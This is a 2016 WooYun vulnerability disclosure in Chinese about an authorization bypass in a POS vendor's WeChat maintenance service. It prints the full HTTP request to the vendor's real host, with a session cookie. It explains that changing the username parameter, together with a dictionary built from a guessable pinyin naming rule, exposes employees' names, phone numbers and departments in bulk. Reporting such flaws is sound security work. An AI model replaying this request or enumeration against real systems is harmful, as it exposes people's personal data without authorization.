当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193124

漏洞标题:POS机安全之爱特POS某越权漏洞泄漏所有员工信息(姓名、手机号、所在部门等)

相关厂商:浙江爱特电子技术有限公司

漏洞作者: 路人甲

提交时间:2016-04-06 18:32

修复时间:2016-05-21 18:40

公开时间:2016-05-21 18:40

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

POS机安全

详细说明:

这个问题存在与微信端-爱特POS运维服务
关注以后我们申请报修
然后查看报修的时候发现一处可越权

POST /schoolweb_pos/posweixin.do?action=CheckUsrno&usrno=shenmq HTTP/1.1
Host: school.activetech.com.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://school.activetech.com.cn
Content-Length: 0
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 MicroMessenger/6.3.15 NetType/WIFI Language/zh_CN
Referer: http://school.activetech.com.cn/schoolweb_pos/posweixin.do?action=weixin_index&weixinid=oo0w6t-B0Nnjkeh9tY04gTxf8dbE&act=online
Cookie: JSESSIONID=30EFFABA5607EECA2E3B42CC68219BE7


只要修改usrno对应的用户名即可查看员工信息

1.jpg


2.jpg


命名规则是 王大锤-wangdc
我们做好指定字典 批量查看下

5.jpg


6.jpg

漏洞证明:

我们做好指定字典 批量查看下

5.jpg


6.jpg

修复方案:

做验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)